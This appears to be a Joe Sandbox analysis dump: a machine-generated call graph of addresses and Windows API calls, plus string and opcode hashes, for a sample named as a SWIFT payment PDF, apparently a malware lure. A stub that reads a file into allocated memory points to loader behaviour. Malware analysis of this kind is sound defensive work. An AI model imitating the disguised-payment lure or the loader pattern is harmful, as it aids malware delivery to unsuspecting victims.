84432->84434 84433->84434 84436 40e2e0 VariantClear ctype 84433->84436 84434->83695 84436->84433 84437->83573 84439 410148 SHGetDesktopFolder 84438->84439 84442 4101a3 _wcscpy 84438->84442 84440 41015a _wcscpy 84439->84440 84439->84442 84441 41018a SHGetPathFromIDListW 84440->84441 84440->84442 84441->84442 84442->83576 84443->83578 84445 40f5e0 152 API calls 84444->84445 84446 40f417 84445->84446 84447 42ca37 84446->84447 84449 40f42c 84446->84449 84450 42ca1f 84446->84450 84448 452574 140 API calls 84447->84448 84452 42ca50 84448->84452 84482 4037e0 139 API calls 7 library calls 84449->84482 84483 43717f 110 API calls _printf 84450->84483 84456 42ca76 84452->84456 84457 42ca54 84452->84457 84454 40f446 84454->83575 84455 42ca2d 84455->84447 84459 41171a 75 API calls 84456->84459 84458 434fe1 106 API calls 84457->84458 84460 42ca5e 84458->84460 84474 42cacc ctype 84459->84474 84484 43717f 110 API calls _printf 84460->84484 84462 42ccc3 84464 413a88 ___convertcp 67 API calls 84462->84464 84463 42ca6c 84463->84456 84465 42cccd 84464->84465 84466 434fe1 106 API calls 84465->84466 84467 42ccda 84466->84467 84471 401b70 75 API calls 84471->84474 84474->84462 84474->84471 84475 402cc0 75 API calls 2 library calls 84474->84475 84476 4026a0 84474->84476 84485 445051 75 API calls _memcpy_s 84474->84485 84486 44c80c 87 API calls 3 library calls 84474->84486 84487 44b408 75 API calls 84474->84487 84475->84474 84477 40276b 84476->84477 84478 4026af 84476->84478 84477->84474 84478->84477 84479 41171a 75 API calls 84478->84479 84480 4026ee ctype 84478->84480 84479->84480 84480->84477 84481 41171a 75 API calls 84480->84481 84481->84480 84482->84454 84483->84455 84484->84463 84485->84474 84486->84474 84487->84474 84488->83585 84489->83586 84491 401bfb 84490->84491 84511 401cde 84490->84511 84513 4013a0 84491->84513 84494 42a9a0 LoadStringW 84497 42a9bb 84494->84497 84495 401c18 84496 4021e0 75 API calls 84495->84496 84498 401c2d 84496->84498 84519 40df50 75 API calls 84497->84519 84500 401c3a 84498->84500 84501 42a9cd 84498->84501 84500->84497 84502 401c44 84500->84502 84520 40d3b0 75 API calls 2 library calls 84501->84520 84518 40d3b0 75 API calls 2 library calls 84502->84518 84505 42a9dc 84506 42a9f0 84505->84506 84508 401c53 _memset _wcscpy _wcsncpy 84505->84508 84521 40d3b0 75 API calls 2 library calls 84506->84521 84510 401cc2 Shell_NotifyIconW 84508->84510 84509 42a9fe 84510->84511 84511->83597 84512->83591 84514 41171a 75 API calls 84513->84514 84515 4013c4 84514->84515 84516 401380 75 API calls 84515->84516 84517 4013d3 84516->84517 84517->84494 84517->84495 84518->84508 84519->84508 84520->84505 84521->84509 84522 42bf81 84523 41171a 75 API calls 84522->84523 84524 42bf88 84523->84524 84525 42bfc1 84524->84525 84526 42bf9b 84524->84526 84528 41171a 75 API calls 84525->84528 84527 41171a 75 API calls 84526->84527 84529 42bfa1 _memcpy_s 84527->84529 84530 42bfc8 84528->84530 84531 47ba63 84532 47bb10 84531->84532 84533 47ba7f 84531->84533 84534 47ba86 84533->84534 84535 47bad4 84533->84535 84536 47bab2 84533->84536 84537 47ba98 84533->84537 84550 453081 84534->84550 84538 453081 111 API calls 84535->84538 84540 453081 111 API calls 84536->84540 84539 453081 111 API calls 84537->84539 84541 47baf0 84538->84541 84539->84534 84543 47bac9 84540->84543 84544 453081 111 API calls 84541->84544 84546 453081 111 API calls 84543->84546 84547 47baf7 84544->84547 84545 47bb09 84556 47a999 84545->84556 84546->84534 84549 453081 111 API calls 84547->84549 84549->84534 84551 4530aa 84550->84551 84553 45308c 84550->84553 84551->84545 84552 4530a1 84552->84545 84553->84552 84601 452e2a 111 API calls 5 library calls 84553->84601 84555 453098 84555->84545 84557 40c060 75 API calls 84556->84557 84558 47a9b9 84557->84558 84559 40c060 75 API calls 84558->84559 84560 47a9c2 84559->84560 84561 40c060 75 API calls 84560->84561 84562 47a9cb 84561->84562 84563 4092c0 VariantClear 84562->84563 84564 47a9f0 84563->84564 84565 47aa02 OleInitialize 84564->84565 84566 47aa10 84564->84566 84565->84566 84602 40fff0 84566->84602 84568 47aa1c CLSIDFromProgID 84569 47aa35 84568->84569 84570 47aa3c 84569->84570 84571 47aa95 CoCreateInstance 84569->84571 84572 47ab2c 84569->84572 84606 4781ae 140 API calls 84570->84606 84571->84570 84578 47aab6 84571->84578 84620 4580e1 82 API calls _memset 84572->84620 84575 47ab52 84575->84570 84577 47ab5f CoInitializeSecurity 84575->84577 84576 47aa4d 84576->84532 84579 47ab81 _memset 84577->84579 84578->84570 84580 47aae4 84578->84580 84621 4342a8 CoTaskMemAlloc _wcslen _wcscpy 84579->84621 84607 467626 84580->84607 84583 47ab99 84584 4021e0 75 API calls 84583->84584 84600 47ac3c _memset _wcslen 84583->84600 84587 47abb3 84584->84587 84585 47acd2 CoCreateInstanceEx 84585->84570 84586 47ad16 84585->84586 84586->84570 84590 47ad5b 84586->84590 84591 47ad2b CoSetProxyBlanket 84586->84591 84588 47abc9 84587->84588 84622 4646f6 75 API calls 84587->84622 84588->84600 84590->84578 84594 47ad7b 84590->84594 84591->84590 84592 47aaf3 84592->84532 84593 47abf6 84623 40df50 75 API calls 84593->84623 84594->84570 84596 47ac00 84624 460976 75 API calls 84596->84624 84598 47ac32 84625 40df50 75 API calls 84598->84625 84600->84585 84600->84588 84601->84555 84603 40fff7 _wcslen 84602->84603 84604 41171a 75 API calls 84603->84604 84605 41000e _wcscpy 84604->84605 84605->84568 84606->84576 84608 4092c0 VariantClear 84607->84608 84609 467635 84608->84609 84610 467699 84609->84610 84626 45e912 132 API calls 2 library calls 84609->84626 84610->84592 84612 467643 84612->84610 84627 467214 132 API calls _memcpy_s 84612->84627 84614 46764e 84614->84610 84615 41171a 75 API calls 84614->84615 84616 467660 VariantInit VariantCopy 84615->84616 84616->84610 84617 46767a VariantClear 84616->84617 84618 46768b ctype 84617->84618 84619 4092c0 VariantClear 84618->84619 84619->84610 84620->84575 84621->84583 84622->84593 84623->84596 84624->84598 84625->84600 84626->84612 84627->84614 84628 479921 84629 479965 84628->84629 84630 479c79 84628->84630 84629->84630 84632 47997b 84629->84632 84677 4781ae 140 API calls 84630->84677 84634 479985 84632->84634 84635 4799a3 84632->84635 84633 479c8d 84670 4781ae 140 API calls 84634->84670 84637 4799ad 84635->84637 84641 4799cb _wcslen 84635->84641 84671 4781ae 140 API calls 84637->84671 84638 479999 84640 4799c1 84642 40fff0 75 API calls 84641->84642 84648 479a32 84641->84648 84643 4799e1 84642->84643 84645 479a0a 84643->84645 84643->84648 84644 479a8f 84646 479ad5 VariantInit 84644->84646 84665 479c28 84644->84665 84672 4781ae 140 API calls 84645->84672 84653 479aee _memset 84646->84653 84648->84644 84650 479a91 84648->84650 84673 476a8a 134 API calls _memcpy_s 84648->84673 84674 4781ae 140 API calls 84650->84674 84652 479a28 84654 479ba1 84653->84654 84655 479bc5 84653->84655 84656 479b6c 84653->84656 84676 4781ae 140 API calls 84654->84676 84659 467626 132 API calls 84655->84659 84656->84654 84657 479b73 84656->84657 84675 4781ae 140 API calls 84657->84675 84663 479bd3 84659->84663 84661 479bb2 VariantClear 84661->84665 84662 479c4d 84666 479c19 VariantClear 84663->84666 84669 467626 132 API calls 84663->84669 84664 479b8b VariantClear 84664->84665 84665->84662 84667 479c42 VariantClear 84665->84667 84668 479c3c VariantClear 84665->84668 84666->84665 84667->84662 84667->84665 84668->84667 84669->84663 84670->84638 84671->84640 84672->84652 84673->84648 84674->84644 84675->84664 84676->84661 84677->84633 84678 452dae 84679 4092c0 VariantClear 84678->84679 84680 452dbd 84679->84680 84681 41171a 75 API calls 84680->84681 84682 452dc4 84681->84682 84683 452e02 84682->84683 84684 452dcf 84682->84684 84686 41171a 75 API calls 84683->84686 84685 41171a 75 API calls 84684->84685 84687 452dd9 _memset 84685->84687 84688 452e09 84686->84688 84689 40116e 84690 401119 DefWindowProcW 84689->84690 84691 429212 84696 410b90 84691->84696 84694 411421 __cinit 74 API calls 84695 42922f 84694->84695 84697 410b9a __write_nolock 84696->84697 84698 41171a 75 API calls 84697->84698 84699 410c31 GetModuleFileNameW 84698->84699 84713 413db0 84699->84713 84701 410c66 _wcsncat 84716 413e3c 84701->84716 84704 41171a 75 API calls 84705 410ca3 _wcscpy 84704->84705 84706 410cd1 RegOpenKeyExW 84705->84706 84707 429bc3 RegQueryValueExW 84706->84707 84708 410cf7 84706->84708 84709 429cd9 RegCloseKey 84707->84709 84711 429bf2 _wcscat _wcslen _wcsncpy 84707->84711 84708->84694 84710 41171a 75 API calls 84710->84711 84711->84710 84712 429cd8 84711->84712 84712->84709 84719 413b95 84713->84719 84749 41abec 84716->84749 84720 413c2f 84719->84720 84725 413bae 84719->84725 84721 413d60 84720->84721 84722 413d7b 84720->84722 84745 417f23 67 API calls __getptd_noexit 84721->84745 84747 417f23 67 API calls __getptd_noexit 84722->84747 84725->84720 84735 413c1d 84725->84735 84741 41ab19 67 API calls __gmtime64_s 84725->84741 84726 413d65 84731 413cfb 84726->84731 84746 417ebb 6 API calls 2 library calls 84726->84746 84729 413d03 84729->84720 84729->84731 84733 413d8e 84729->84733 84730 413cb9 84730->84720 84732 413cd6 84730->84732 84743 41ab19 67 API calls __gmtime64_s 84730->84743 84731->84701 84732->84720 84732->84731 84737 413cef 84732->84737 84748 41ab19 67 API calls __gmtime64_s 84733->84748 84735->84720 84740 413c9b 84735->84740 84742 41ab19 67 API calls __gmtime64_s 84735->84742 84744 41ab19 67 API calls __gmtime64_s 84737->84744 84740->84729 84740->84730 84741->84735 84742->84740 84743->84732 84744->84731 84745->84726 84747->84726 84748->84731 84750 41ac02 84749->84750 84751 41abfd 84749->84751 84758 417f23 67 API calls __getptd_noexit 84750->84758 84751->84750 84755 41ac22 84751->84755 84753 41ac07 84759 417ebb 6 API calls 2 library calls 84753->84759 84757 410c99 84755->84757 84760 417f23 67 API calls __getptd_noexit 84755->84760 84757->84704 84758->84753 84760->84753 84761 401230 84762 401241 _memset 84761->84762 84763 4012c5 84761->84763 84764 401be0 77 API calls 84762->84764 84765 40126b 84764->84765 84766 4012ae KillTimer SetTimer 84765->84766 84767 42aa61 84765->84767 84768 401298 84765->84768 84766->84763 84771 42aa8b Shell_NotifyIconW 84767->84771 84772 42aa69 Shell_NotifyIconW 84767->84772 84769 4012a2 84768->84769 84770 42aaac 84768->84770 84769->84766 84775 42aaf8 Shell_NotifyIconW 84769->84775 84773 42aad7 Shell_NotifyIconW 84770->84773 84774 42aab5 Shell_NotifyIconW 84770->84774 84771->84766 84772->84766 84773->84766 84774->84766 84775->84766 84776 40c170 84777 40c17b 84776->84777 84778 40c1a5 _memcpy_s 84776->84778 84777->84778 84779 40c1d6 84777->84779 84780 40c19b 84777->84780 84781 41171a 75 API calls 84779->84781 84785 4034b0 84780->84785 84783 40c1df 84781->84783 84783->84778 84784 41171a 75 API calls 84783->84784 84784->84778 84786 4034b9 84785->84786 84787 4034bd 84785->84787 84786->84778 84788 41171a 75 API calls 84787->84788 84789 42a0ba 84787->84789 84790 4034fe _memcpy_s ctype 84788->84790 84790->84778 84791 40f110 RegOpenKeyExW 84792 40f13c RegQueryValueExW RegCloseKey 84791->84792 84793 40f15f 84791->84793 84792->84793 84794 431914 84795 431920 84794->84795 84796 431928 84795->84796 84797 43193d 84795->84797 85003 45e62e 116 API calls 3 library calls 84796->85003 85004 47f2b4 174 API calls 84797->85004 84800 43194a 84838 4095b0 ctype 84800->84838 85005 45e62e 116 API calls 3 library calls 84800->85005 84802 409708 84804 4097af 84804->84802 84989 40d590 VariantClear 84804->84989 84806 4315b8 WaitForSingleObject 84808 4315d6 GetExitCodeProcess CloseHandle 84806->84808 84806->84838 84807 431623 Sleep 84810 43163b timeGetTime 84807->84810 84831 409894 84807->84831 84994 40d590 VariantClear 84808->84994 84810->84831 84813 40986e Sleep 84816 409880 timeGetTime 84813->84816 84813->84831 84816->84831 84817 4098f1 TranslateMessage DispatchMessageW 84817->84838 84818 431673 CloseHandle 84818->84831 84819 43170c GetExitCodeProcess CloseHandle 84819->84831 84821 46e641 134 API calls 84821->84831 84823 46dd22 133 API calls 84823->84831 84825 431781 Sleep 84825->84838 84828 40d590 VariantClear 84828->84831 84831->84818 84831->84819 84831->84821 84831->84823 84831->84825 84831->84828 84836 4092c0 VariantClear 84831->84836 84831->84838 84991 447e59 75 API calls 84831->84991 84992 453b07 77 API calls 84831->84992 84993 4646a2 76 API calls 84831->84993 84995 444233 88 API calls _wcslen 84831->84995 84996 457509 VariantClear 84831->84996 84997 404120 84831->84997 85001 4717e3 VariantClear 84831->85001 85002 436272 6 API calls 84831->85002 84834 45e62e 116 API calls 84834->84838 84835 4319c9 VariantClear 84835->84838 84836->84831 84837 4092c0 VariantClear 84837->84838 84838->84802 84838->84804 84838->84806 84838->84807 84838->84813 84838->84817 84838->84831 84838->84834 84838->84835 84838->84837 84840 409030 84838->84840 84854 40d300 84838->84854 84859 40d320 84838->84859 84865 40b380 119 API calls ctype 84838->84865 84866 409a40 84838->84866 84990 409340 174 API calls ctype 84838->84990 85006 40e380 VariantClear ctype 84838->85006 85007 409110 117 API calls 84840->85007 84842 42ceb6 85017 410ae0 VariantClear ctype 84842->85017 84844 42cebf 84845 42cea9 85016 45e62e 116 API calls 3 library calls 84845->85016 84847 40906e 84847->84842 84847->84845 84848 4090a4 84847->84848 85008 404160 84848->85008 84851 4090f0 ctype 84851->84838 84852 4092c0 VariantClear 84853 4090be ctype 84852->84853 84853->84851 84853->84852 84855 40d30c 84854->84855 84857 4292e3 84854->84857 84855->84838 84856 429323 84856->84838 84857->84856 84858 4292fd TranslateAcceleratorW 84857->84858 84858->84855 84860 4296d0 84859->84860 84863 40d32f 84859->84863 84860->84838 84861 40d33c 84861->84838 84862 42972a IsDialogMessageW 84862->84861 84862->84863 84863->84861 84863->84862 85193 4340ec GetClassLongW 84863->85193 84865->84838 84867 409a66 _wcslen 84866->84867 84868 41171a 75 API calls 84867->84868 84927 40aade _memcpy_s ctype 84867->84927 84869 409a9c _memcpy_s 84868->84869 84870 41171a 75 API calls 84869->84870 84872 409abd 84870->84872 84871 401380 75 API calls 84873 42cee9 84871->84873 84874 409aeb CharUpperBuffW 84872->84874 84878 409b09 ctype 84872->84878 84872->84927 84875 41171a 75 API calls 84873->84875 84874->84878 84884 42cf10 _memcpy_s 84875->84884 84916 409b88 ctype 84878->84916 85195 47d10e 150 API calls 84878->85195 84879 42dbb9 84880 4092c0 VariantClear 84879->84880 84881 42e5e0 84880->84881 85225 410ae0 VariantClear ctype 84881->85225 84883 42e5f2 85224 45e62e 116 API calls 3 library calls 84884->85224 84885 409e4a 84885->84884 84887 41171a 75 API calls 84885->84887 84891 409ea4 84885->84891 84886 40aa5b 84888 41171a 75 API calls 84886->84888 84887->84891 84909 40aa81 _memcpy_s ctype 84888->84909 84889 409ed0 84893 42d50d 84889->84893 84952 409ef8 _memcpy_s ctype 84889->84952 85204 40b800 VariantClear VariantClear ctype 84889->85204 84890 40c3e0 75 API calls 84890->84916 84891->84889 84892 41171a 75 API calls 84891->84892 84894 42d480 84892->84894 84895 42d527 84893->84895 85205 40b800 VariantClear VariantClear ctype 84893->85205 84899 42d491 84894->84899 85200 44b3f6 75 API calls 84894->85200 84895->84952 85206 40e2e0 VariantClear ctype 84895->85206 84896 40a3a7 84900 40a415 84896->84900 84949 42db5c 84896->84949 84897 42d195 VariantClear 84897->84916 85201 40df50 75 API calls 84899->85201 84905 41171a 75 API calls 84900->84905 84901 4092c0 VariantClear 84901->84916 84923 40a41c 84905->84923 84907 41171a 75 API calls 84907->84916 84915 41171a 75 API calls 84909->84915 84911 42d4a6 85202 4530b3 75 API calls 84911->85202 84913 42db96 85211 45e62e 116 API calls 3 library calls 84913->85211 84915->84927 84916->84879 84916->84884 84916->84885 84916->84886 84916->84890 84916->84897 84916->84901 84916->84907 84916->84909 84917 42d128 84916->84917 84921 42d20c 84916->84921 85196 40c620 118 API calls 84916->85196 85198 40be00 75 API calls 2 library calls 84916->85198 85199 40e380 VariantClear ctype 84916->85199 84919 4092c0 VariantClear 84917->84919 84922 42d131 84919->84922 84920 42d4d7 85203 4530b3 75 API calls 84920->85203 84921->84838 85197 410ae0 VariantClear ctype 84922->85197 84934 40a481 84923->84934 85212 40c8a0 VariantClear ctype 84923->85212 84927->84871 84931 402cc0 75 API calls 84931->84952 84932 4092c0 VariantClear 84964 40a534 _memcpy_s ctype 84932->84964 84933 411421 74 API calls __cinit 84933->84952 84935 40a4ed 84934->84935 84936 42dc1e VariantClear 84934->84936 84934->84964 84940 40a4ff ctype 84935->84940 85213 40e380 VariantClear ctype 84935->85213 84936->84940 84939 41171a 75 API calls 84939->84964 84940->84939 84940->84964 84941 4019e0 76 API calls 84941->84952 84944 44b3f6 75 API calls 84944->84952 84945 42deb6 VariantClear 84945->84964 84946 41171a 75 API calls 84946->84952 84947 40a73c 84948 42e237 84947->84948 84957 40a76b 84947->84957 85217 46e709 VariantClear VariantClear ctype 84948->85217 85210 4721e5 VariantClear 84949->85210 84950 42df47 VariantClear 84950->84964 84951 42dfe9 VariantClear 84951->84964 84952->84896 84952->84913 84952->84927 84952->84931 84952->84933 84952->84941 84952->84944 84952->84946 84952->84949 84953 40a053 84952->84953 85207 45ee98 75 API calls 84952->85207 85208 404260 76 API calls 84952->85208 85209 409210 VariantClear 84952->85209 84953->84838 84954 40a7a2 84969 40a7ad ctype 84954->84969 85218 40b800 VariantClear VariantClear ctype 84954->85218 84956 40e380 VariantClear 84956->84964 84957->84954 84981 40a800 ctype 84957->84981 85194 40b800 VariantClear VariantClear ctype 84957->85194 84960 41171a 75 API calls 84960->84964 84961 40a8b0 84975 40a8c2 ctype 84961->84975 85220 40e380 VariantClear ctype 84961->85220 84962 42e312 84965 42e337 VariantClear 84962->84965 84962->84975 84963 41171a 75 API calls 84966 42dd10 VariantInit VariantCopy 84963->84966 84964->84932 84964->84945 84964->84947 84964->84948 84964->84950 84964->84951 84964->84956 84964->84960 84964->84963 85214 46e9cd 75 API calls 84964->85214 85215 409210 VariantClear 84964->85215 85216 44cc6c VariantClear ctype 84964->85216 84965->84975 84966->84964 84970 42dd30 VariantClear 84966->84970 84968 42e3b2 84976 42e3da VariantClear 84968->84976 84982 40a91a ctype 84968->84982 84971 40a7ee 84969->84971 84972 42e2a7 VariantClear 84969->84972 84969->84981 84970->84964 84971->84981 85219 40e380 VariantClear ctype 84971->85219 84972->84981 84973 40a908 84973->84982 85221 40e380 VariantClear ctype 84973->85221 84975->84968 84975->84973 84976->84982 84977 42e47f 84983 42e4a3 VariantClear 84977->84983 84988 40a957 ctype 84977->84988 84980 40a945 84980->84988 85222 40e380 VariantClear ctype 84980->85222 84981->84961 84981->84962 84982->84977 84982->84980 84983->84988 84985 40aa22 ctype 84985->84838 84986 42e559 VariantClear 84986->84988 84988->84985 84988->84986 85223 40e380 VariantClear ctype 84988->85223 84989->84802 84990->84838 84991->84831 84992->84831 84993->84831 84994->84831 84995->84831 84996->84831 84998 40412e 84997->84998 84999 4092c0 VariantClear 84998->84999 85000 404138 84999->85000 85000->84825 85001->84831 85002->84831 85003->84838 85004->84800 85005->84838 85006->84838 85007->84847 85009 4092c0 VariantClear 85008->85009 85010 40416e 85009->85010 85011 404120 VariantClear 85010->85011 85012 40419b 85011->85012 85018 480df5 85012->85018 85026 4734b7 85012->85026 85013 4041c6 85013->84842 85013->84853 85016->84842 85017->84844 85019 453081 111 API calls 85018->85019 85020 480e33 85019->85020 85070 402dd0 85020->85070 85022 480e3b 85025 480e65 85022->85025 85099 40e6d0 76 API calls 85022->85099 85024 480e9f 85024->85013 85025->85013 85109 453063 85026->85109 85029 473545 85113 463c42 85029->85113 85030 47350c 85031 4092c0 VariantClear 85030->85031 85036 473514 85031->85036 85033 473558 85034 47355c 85033->85034 85050 473595 85033->85050 85037 4092c0 VariantClear 85034->85037 85035 473616 85126 463d7e 85035->85126 85036->85013 85046 473564 85037->85046 85039 453063 111 API calls 85039->85050 85040 473622 85041 473697 85040->85041 85042 47362c 85040->85042 85160 457838 85041->85160 85045 4092c0 VariantClear 85042->85045 85047 473634 85045->85047 85046->85013 85047->85013 85049 473655 85053 4092c0 VariantClear 85049->85053 85050->85035 85050->85039 85050->85049 85172 462f5a 87 API calls __wcsicoll 85050->85172 85064 47365d 85053->85064 85054 4736b0 85173 45e62e 116 API calls 3 library calls 85054->85173 85055 4736c9 85057 40e7e0 76 API calls 85055->85057 85059 4736db 85057->85059 85058 4736ba GetCurrentProcess TerminateProcess 85058->85055 85068 4736ff 85059->85068 85174 40d030 76 API calls 85059->85174 85061 473731 85066 473744 FreeLibrary 85061->85066 85067 47374b 85061->85067 85062 4736f1 85175 46b945 134 API calls 2 library calls 85062->85175 85064->85013 85066->85067 85067->85013 85068->85061 85176 40d030 76 API calls 85068->85176 85177 46b945 134 API calls 2 library calls 85068->85177 85071 41171a 75 API calls 85070->85071 85072 402e03 85071->85072 85073 41171a 75 API calls 85072->85073 85094 402e16 ctype 85073->85094 85076 40305a ctype 85101 402cc0 75 API calls 2 library calls 85076->85101 85078 42b5fe 85105 45ffa9 118 API calls 3 library calls 85078->85105 85079 403770 75 API calls 85079->85094 85081 42b612 85098 403094 ctype 85081->85098 85106 45ffa9 118 API calls 3 library calls 85081->85106 85082 42b5c3 85104 45ffa9 118 API calls 3 library calls 85082->85104 85084 403470 75 API calls 85084->85094 85087 42b68a 85108 402cc0 75 API calls 2 library calls 85087->85108 85088 42b655 85097 42b5e1 85088->85097 85107 402cc0 75 API calls 2 library calls 85088->85107 85089 402ae0 75 API calls 85090 402ff0 CharUpperBuffW 85089->85090 85090->85094 85092 402650 75 API calls 85092->85094 85094->85076 85094->85078 85094->85079 85094->85081 85094->85082 85094->85084 85094->85087 85094->85089 85094->85092 85095 41171a 75 API calls 85094->85095 85096 402cc0 75 API calls 85094->85096 85100 4035d0 86 API calls 85094->85100 85102 402b70 76 API calls 85094->85102 85103 403530 118 API calls _memcpy_s 85094->85103 85095->85094 85096->85094 85097->85098 85098->85022 85099->85024 85100->85094 85101->85098 85102->85094 85103->85094 85104->85097 85105->85081 85106->85088 85107->85097 85108->85098 85110 45306e 85109->85110 85111 45307a 85109->85111 85110->85111 85178 452e2a 111 API calls 5 library calls 85110->85178 85111->85029 85111->85030 85179 45335b 76 API calls 85113->85179 85115 463c5d 85180 442c52 80 API calls _wcslen 85115->85180 85117 463c72 85119 40c060 75 API calls 85117->85119 85125 463cac 85117->85125 85120 463c8e 85119->85120 85181 4608ce 75 API calls _memcpy_s 85120->85181 85122 463ca4 85123 40c740 75 API calls 85122->85123 85123->85125 85124 463cf7 85124->85033 85125->85124 85182 462f5a 87 API calls __wcsicoll 85125->85182 85127 453063 111 API calls 85126->85127 85128 463d99 85127->85128 85129 463de0 85128->85129 85130 463dca 85128->85130 85183 40c760 78 API calls 85129->85183 85131 453081 111 API calls 85130->85131 85133 463dd0 LoadLibraryW 85131->85133 85135 463e09 85133->85135 85134 463de7 85139 463e19 85134->85139 85184 40c760 78 API calls 85134->85184 85137 463e3e 85135->85137 85135->85139 85140 463e4e 85137->85140 85141 463e7b 85137->85141 85138 463dfb 85138->85139 85185 40c760 78 API calls 85138->85185 85139->85040 85186 40d500 75 API calls 85140->85186 85188 40c760 78 API calls 85141->85188 85145 463e57 85187 45efe7 77 API calls ctype 85145->85187 85146 463e82 GetProcAddress 85149 463e90 85146->85149 85148 463e62 GetProcAddress 85151 463e79 85148->85151 85149->85139 85150 463edf 85149->85150 85149->85151 85150->85139 85154 463eef FreeLibrary 85150->85154 85151->85149 85189 403470 75 API calls _memcpy_s 85151->85189 85153 463eb4 85190 40d500 75 API calls 85153->85190 85154->85139 85156 463ebd 85191 45efe7 77 API calls ctype 85156->85191 85158 463ec8 GetProcAddress 85192 401330 ctype 85158->85192 85161 457a4c 85160->85161 85167 45785f _strcat _wcslen _wcscpy ctype 85160->85167 85168 410d40 85161->85168 85162 40c760 78 API calls 85162->85167 85163 453081 111 API calls 85163->85167 85164 443576 78 API calls 85164->85167 85165 4138ba 67 API calls _malloc 85165->85167 85166 40f580 77 API calls 85166->85167 85167->85161 85167->85162 85167->85163 85167->85164 85167->85165 85167->85166 85170 410d55 85168->85170 85169 410ded VirtualProtect 85171 410dbb 85169->85171 85170->85169 85170->85171 85171->85054 85171->85055 85172->85050 85173->85058 85174->85062 85175->85068 85176->85068 85177->85068 85178->85111 85179->85115 85180->85117 85181->85122 85182->85124 85183->85134 85184->85138 85185->85135 85186->85145 85187->85148 85188->85146 85189->85153 85190->85156 85191->85158 85192->85150 85193->84863 85194->84954 85195->84878 85196->84916 85197->84985 85198->84916 85199->84916 85200->84899 85201->84911 85202->84920 85203->84889 85204->84893 85205->84895 85206->84952 85207->84952 85208->84952 85209->84952 85210->84913 85211->84879 85212->84923 85213->84940 85214->84964 85215->84964 85216->84964 85217->84954 85218->84969 85219->84981 85220->84975 85221->84982 85222->84988 85223->84988 85224->84879 85225->84883 85226 42919b 85231 40ef10 85226->85231 85229 411421 __cinit 74 API calls 85230 4291aa 85229->85230 85232 41171a 75 API calls 85231->85232 85233 40ef17 85232->85233 85234 42ad48 85233->85234 85239 40ef40 74 API calls __cinit 85233->85239 85236 40ef2a 85240 40e470 85236->85240 85239->85236 85241 40c060 75 API calls 85240->85241 85242 40e483 GetVersionExW 85241->85242 85243 4021e0 75 API calls 85242->85243 85244 40e4bb 85243->85244 85266 40e600 85244->85266 85251 42accc 85252 42ad28 GetSystemInfo 85251->85252 85256 42ad38 GetSystemInfo 85252->85256 85253 40e557 GetCurrentProcess 85286 40ee30 LoadLibraryA GetProcAddress 85253->85286 85254 40e56c 85254->85256 85279 40eee0 85254->85279 85259 40e5c9 85283 40eea0 85259->85283 85262 40e5e0 85264 40e5f1 FreeLibrary 85262->85264 85265 40e5f4 85262->85265 85263 40e5dd FreeLibrary 85263->85262 85264->85265 85265->85229 85267 40e60b 85266->85267 85268 40c740 75 API calls 85267->85268 85269 40e4c2 85268->85269 85270 40e620 85269->85270 85271 40e62a 85270->85271 85272 42ac93 85271->85272 85273 40c740 75 API calls 85271->85273 85274 40e4ce 85273->85274 85274->85251 85275 40ee70 85274->85275 85276 40e551 85275->85276 85277 40ee76 LoadLibraryA 85275->85277 85276->85253 85276->85254 85277->85276 85278 40ee87 GetProcAddress 85277->85278 85278->85276 85280 40e5bf 85279->85280 85281 40eee6 LoadLibraryA 85279->85281 85280->85252 85280->85259 85281->85280 85282 40eef7 GetProcAddress 85281->85282 85282->85280 85287 40eec0 LoadLibraryA GetProcAddress 85283->85287 85285 40e5d3 GetNativeSystemInfo 85285->85262 85285->85263 85286->85254 85287->85285 85288 3f23828 85289 3f21478 GetPEB 85288->85289 85290 3f23930 85289->85290 85302 3f23718 85290->85302 85292 3f23959 CreateFileW 85294 3f239b0 85292->85294 85295 3f239ab 85292->85295 85294->85295 85296 3f239c7 VirtualAlloc 85294->85296 85296->85295 85297 3f239e5 ReadFile 85296->85297 85297->85295 85298 3f23a03 85297->85298 85299 3f22718 13 API calls 85298->85299 85300 3f23a36 85299->85300 85301 3f23a59 ExitProcess 85300->85301 85301->85295 85303 3f23721 Sleep 85302->85303 85304 3f2372f 85303->85304 85305 42e89e 85312 40c000 85305->85312 85307 42e8ac 85308 409a40 165 API calls 85307->85308 85309 42e8ca 85308->85309 85323 44b92e VariantClear 85309->85323 85311 42f3ae 85313 40c014 85312->85313 85314 40c007 85312->85314 85316 40c01a 85313->85316 85317 40c02c 85313->85317 85324 409210 VariantClear 85314->85324 85325 409210 VariantClear 85316->85325 85318 41171a 75 API calls 85317->85318 85322 40c033 85318->85322 85319 40c00f 85319->85307 85321 40c023 85321->85307 85322->85307 85323->85311 85324->85319 85325->85321
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00409A61
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                        • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                        • String ID: 0vH$4RH
                                                        • API String ID: 1143807570-2085553193
                                                        • Opcode ID: baad96973654f357a8d3d6bb2646daeab4484acc1eba6652636040357d4fcba3
                                                        • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                        • Opcode Fuzzy Hash: baad96973654f357a8d3d6bb2646daeab4484acc1eba6652636040357d4fcba3
